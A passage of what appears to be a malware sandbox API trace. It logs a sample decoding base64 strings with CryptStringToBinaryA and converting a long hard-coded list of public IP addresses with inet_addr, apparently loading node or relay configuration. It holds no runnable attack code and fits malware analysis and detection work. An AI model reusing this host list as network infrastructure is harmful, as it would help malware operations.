(cp="51.81.84.166") returned 0xa6545133 [0119.325] CryptStringToBinaryA (in: pszString="BFHxQtLvGH+ruamhdyXabFG6OXg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] CryptStringToBinaryA (in: pszString="BFHxQtLvGH+ruamhdyXabFG6OXg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.325] malloc (_Size=0x74) returned 0x3d6a4b0 [0119.325] inet_addr (cp="185.118.68.39") returned 0x274476b9 [0119.325] CryptStringToBinaryA (in: pszString="BFnapJf8t6O7YqbMik1xlk6yGEI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] CryptStringToBinaryA (in: pszString="BFnapJf8t6O7YqbMik1xlk6yGEI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] malloc (_Size=0x74) returned 0x3d6aeb0 [0119.326] inet_addr (cp="198.245.50.208") returned 0xd032f5c6 [0119.326] CryptStringToBinaryA (in: pszString="BGV4KW1qVZzzN5Yw88dsHHitCkc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] CryptStringToBinaryA (in: pszString="BGV4KW1qVZzzN5Yw88dsHHitCkc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] malloc (_Size=0x74) returned 0x3d6a8b0 [0119.326] inet_addr (cp="87.123.240.120") returned 0x78f07b57 [0119.326] CryptStringToBinaryA (in: pszString="BGma8MsrWn9c+UPTEBH1D2Ab6Mc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] CryptStringToBinaryA (in: pszString="BGma8MsrWn9c+UPTEBH1D2Ab6Mc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] malloc (_Size=0x74) returned 0x3d6a2b0 [0119.326] inet_addr (cp="51.91.111.64") returned 0x406f5b33 [0119.326] CryptStringToBinaryA (in: pszString="BG8tWahfrmk2dqh1M3F8V0NiYcI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] CryptStringToBinaryA (in: pszString="BG8tWahfrmk2dqh1M3F8V0NiYcI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] malloc (_Size=0x74) returned 0x3d6a530 [0119.326] inet_addr (cp="95.217.62.4") returned 0x43ed95f [0119.326] CryptStringToBinaryA (in: pszString="BH8Pj85Nu/QBUeSFJJ3S13CJybQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] CryptStringToBinaryA (in: pszString="BH8Pj85Nu/QBUeSFJJ3S13CJybQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.326] malloc (_Size=0x74) returned 0x3d6a3b0 [0119.326] inet_addr (cp="183.88.42.36") returned 0x242a58b7 [0119.326] CryptStringToBinaryA (in: pszString="BIUCego0nUVNl49sHOzdKeoXdpo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] CryptStringToBinaryA (in: pszString="BIUCego0nUVNl49sHOzdKeoXdpo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] malloc (_Size=0x74) returned 0x3d6a5b0 [0119.327] inet_addr (cp="192.42.116.17") returned 0x11742ac0 [0119.327] CryptStringToBinaryA (in: pszString="BJhSoQgFg16assVR1sQ4vm3oskw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] CryptStringToBinaryA (in: pszString="BJhSoQgFg16assVR1sQ4vm3oskw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] malloc (_Size=0x74) returned 0x3d6a630 [0119.327] inet_addr (cp="193.218.118.180") returned 0xb476dac1 [0119.327] CryptStringToBinaryA (in: pszString="BJwRaJlrM7IkDfbYPDW4VFLPcKY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] CryptStringToBinaryA (in: pszString="BJwRaJlrM7IkDfbYPDW4VFLPcKY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] malloc (_Size=0x74) returned 0x3d6a7b0 [0119.327] inet_addr (cp="78.107.239.213") returned 0xd5ef6b4e [0119.327] CryptStringToBinaryA (in: pszString="BKKKYvJ9nEpg+e0MQmTpi5iMZaM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] CryptStringToBinaryA (in: pszString="BKKKYvJ9nEpg+e0MQmTpi5iMZaM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] malloc (_Size=0x74) returned 0x3d6a430 [0119.327] inet_addr (cp="163.172.169.253") returned 0xfda9aca3 [0119.327] CryptStringToBinaryA (in: pszString="BKl/W9pKJcpa1vH+uF9+wN7MY8I", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] CryptStringToBinaryA (in: pszString="BKl/W9pKJcpa1vH+uF9+wN7MY8I", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] malloc (_Size=0x74) returned 0x3d6ae30 [0119.327] inet_addr (cp="195.154.252.151") returned 0x97fc9ac3 [0119.327] CryptStringToBinaryA (in: pszString="BLfpcFgPIb6Lq/DMmiPSy/wiIpU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.327] CryptStringToBinaryA (in: pszString="BLfpcFgPIb6Lq/DMmiPSy/wiIpU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] malloc (_Size=0x74) returned 0x3d6a930 [0119.328] inet_addr (cp="212.17.102.77") returned 0x4d6611d4 [0119.328] CryptStringToBinaryA (in: pszString="BME5mEA46sEe12Qm4aAyBvyGOoA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] CryptStringToBinaryA (in: pszString="BME5mEA46sEe12Qm4aAyBvyGOoA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] malloc (_Size=0x74) returned 0x3d6af30 [0119.328] inet_addr (cp="46.138.245.45") returned 0x2df58a2e [0119.328] CryptStringToBinaryA (in: pszString="BMNGi+JHQDR8vMAFNMlA28vKvII", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] CryptStringToBinaryA (in: pszString="BMNGi+JHQDR8vMAFNMlA28vKvII", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] malloc (_Size=0x74) returned 0x3d6a9b0 [0119.328] inet_addr (cp="51.158.187.110") returned 0x6ebb9e33 [0119.328] CryptStringToBinaryA (in: pszString="BNnOqNd4q6EwsBT3WMK8rdMdoF4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] CryptStringToBinaryA (in: pszString="BNnOqNd4q6EwsBT3WMK8rdMdoF4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] malloc (_Size=0x74) returned 0x3d6a330 [0119.328] inet_addr (cp="64.94.212.135") returned 0x87d45e40 [0119.328] CryptStringToBinaryA (in: pszString="BN/gR6zfemYgrKeC+vxe8a5/R1Q", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] CryptStringToBinaryA (in: pszString="BN/gR6zfemYgrKeC+vxe8a5/R1Q", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] malloc (_Size=0x74) returned 0x3d6afb0 [0119.328] inet_addr (cp="46.22.212.230") returned 0xe6d4162e [0119.328] CryptStringToBinaryA (in: pszString="BO5eGyMSfSajb3HGaBDYiwuAu5E", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] CryptStringToBinaryA (in: pszString="BO5eGyMSfSajb3HGaBDYiwuAu5E", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.328] malloc (_Size=0x74) returned 0x3d6b030 [0119.328] inet_addr (cp="91.213.233.138") returned 0x8ae9d55b [0119.329] CryptStringToBinaryA (in: pszString="BQ88giViPoRqIFarvD74KSysJIc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.329] CryptStringToBinaryA (in: pszString="BQ88giViPoRqIFarvD74KSysJIc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.329] malloc (_Size=0x74) returned 0x3d6aab0 [0119.329] inet_addr (cp="185.150.117.192") returned 0xc07596b9 [0119.329] CryptStringToBinaryA (in: pszString="BRL+a+nMoO0TMVLmQBCy+6FB6xA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.329] CryptStringToBinaryA (in: pszString="BRL+a+nMoO0TMVLmQBCy+6FB6xA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d73018, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d73018, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.329] malloc (_Size=0x74) returned 0x3d6a0b0 [0119.429] inet_addr (cp="5.9.43.211") returned 0xd32b0905 [0119.429] CryptStringToBinaryA (in: pszString="BRXAn/b3JkS5IsjZkShIn6U7ofw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.429] CryptStringToBinaryA (in: pszString="BRXAn/b3JkS5IsjZkShIn6U7ofw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.429] malloc (_Size=0x74) returned 0x3d8b168 [0119.431] inet_addr (cp="198.98.52.75") returned 0x4b3462c6 [0119.431] CryptStringToBinaryA (in: pszString="BRYIXWysQO1M3O/fxcz2sA3mHe0", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.431] CryptStringToBinaryA (in: pszString="BRYIXWysQO1M3O/fxcz2sA3mHe0", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.431] malloc (_Size=0x74) returned 0x3d8af68 [0119.431] inet_addr (cp="176.10.99.207") returned 0xcf630ab0 [0119.431] CryptStringToBinaryA (in: pszString="BRahpYNoJfWISNR7kfR8tZO1jVQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.431] CryptStringToBinaryA (in: pszString="BRahpYNoJfWISNR7kfR8tZO1jVQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.431] malloc (_Size=0x74) returned 0x3d8afe8 [0119.431] inet_addr (cp="185.183.159.99") returned 0x639fb7b9 [0119.432] CryptStringToBinaryA (in: pszString="BR1o9IDj/r/CUilOci3mxUYto7k", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] CryptStringToBinaryA (in: pszString="BR1o9IDj/r/CUilOci3mxUYto7k", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] malloc (_Size=0x74) returned 0x3d8b268 [0119.432] inet_addr (cp="77.12.22.64") returned 0x40160c4d [0119.432] CryptStringToBinaryA (in: pszString="BR5JRiRNCiIaZ2/56ld/yQpXP0g", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] CryptStringToBinaryA (in: pszString="BR5JRiRNCiIaZ2/56ld/yQpXP0g", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] malloc (_Size=0x74) returned 0x3d8b1e8 [0119.432] inet_addr (cp="78.46.99.170") returned 0xaa632e4e [0119.432] CryptStringToBinaryA (in: pszString="BSmeOPJm/0r7uvZ7RQK3Es4owzk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] CryptStringToBinaryA (in: pszString="BSmeOPJm/0r7uvZ7RQK3Es4owzk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] malloc (_Size=0x74) returned 0x3d8b5e8 [0119.432] inet_addr (cp="95.25.107.230") returned 0xe66b195f [0119.432] CryptStringToBinaryA (in: pszString="BTScDzXFY1pwiIgAT4sCKTHovuY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] CryptStringToBinaryA (in: pszString="BTScDzXFY1pwiIgAT4sCKTHovuY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] malloc (_Size=0x74) returned 0x3d8aee8 [0119.432] inet_addr (cp="37.120.146.88") returned 0x58927825 [0119.432] CryptStringToBinaryA (in: pszString="BTYOlVxMTFHLoUDf3fyL3irPYkQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] CryptStringToBinaryA (in: pszString="BTYOlVxMTFHLoUDf3fyL3irPYkQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.432] malloc (_Size=0x74) returned 0x3d8b0e8 [0119.432] inet_addr (cp="195.254.134.194") returned 0xc286fec3 [0119.433] CryptStringToBinaryA (in: pszString="BUAq7HOFVMUwj7B8polh1TJtXUo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] CryptStringToBinaryA (in: pszString="BUAq7HOFVMUwj7B8polh1TJtXUo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] malloc (_Size=0x74) returned 0x3d8b068 [0119.433] inet_addr (cp="51.75.65.102") returned 0x66414b33 [0119.433] CryptStringToBinaryA (in: pszString="BUmVB9qLOBNw4IWKeEw6/hPckn8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] CryptStringToBinaryA (in: pszString="BUmVB9qLOBNw4IWKeEw6/hPckn8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] malloc (_Size=0x74) returned 0x3d8ad68 [0119.433] inet_addr (cp="178.162.199.66") returned 0x42c7a2b2 [0119.433] CryptStringToBinaryA (in: pszString="BVMOdR6A4RcS9726B3ZZsvBEfIQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] CryptStringToBinaryA (in: pszString="BVMOdR6A4RcS9726B3ZZsvBEfIQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] malloc (_Size=0x74) returned 0x3d8ab68 [0119.433] inet_addr (cp="76.113.159.49") returned 0x319f714c [0119.433] CryptStringToBinaryA (in: pszString="BVsVWkSpaEkdce7xHTtq44CC9vw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] CryptStringToBinaryA (in: pszString="BVsVWkSpaEkdce7xHTtq44CC9vw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] malloc (_Size=0x74) returned 0x3d8ade8 [0119.433] inet_addr (cp="46.38.48.225") returned 0xe130262e [0119.433] CryptStringToBinaryA (in: pszString="BV4nGkiqCC5qn+iOpY23OmAM3yQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] CryptStringToBinaryA (in: pszString="BV4nGkiqCC5qn+iOpY23OmAM3yQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.433] malloc (_Size=0x74) returned 0x3d8b8e8 [0119.433] inet_addr (cp="163.172.28.118") returned 0x761caca3 [0119.433] CryptStringToBinaryA (in: pszString="BWAbEQuIi/OhLhDovzwLAhZr8/E", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] CryptStringToBinaryA (in: pszString="BWAbEQuIi/OhLhDovzwLAhZr8/E", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] malloc (_Size=0x74) returned 0x3d8b2e8 [0119.434] inet_addr (cp="51.81.83.148") returned 0x94535133 [0119.434] CryptStringToBinaryA (in: pszString="BWgal2eDTZ7am9/k4Vob1zxP388", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] CryptStringToBinaryA (in: pszString="BWgal2eDTZ7am9/k4Vob1zxP388", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] malloc (_Size=0x74) returned 0x3d8b768 [0119.434] inet_addr (cp="109.236.83.11") returned 0xb53ec6d [0119.434] CryptStringToBinaryA (in: pszString="BXesZrvV6DiSWl+m/tdeBDaDIOA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] CryptStringToBinaryA (in: pszString="BXesZrvV6DiSWl+m/tdeBDaDIOA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] malloc (_Size=0x74) returned 0x3d8b368 [0119.434] inet_addr (cp="178.73.220.25") returned 0x19dc49b2 [0119.434] CryptStringToBinaryA (in: pszString="BYKWpJzmgPMMlfL8gUMuFNc6Px8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] CryptStringToBinaryA (in: pszString="BYKWpJzmgPMMlfL8gUMuFNc6Px8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.434] malloc (_Size=0x74) returned 0x3d8ac68 [0119.434] inet_addr (cp="84.53.192.243") returned 0xf3c03554 [0119.434] CryptStringToBinaryA (in: pszString="BZIIQYqF2upTcCf1SvnbigGv84E", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, 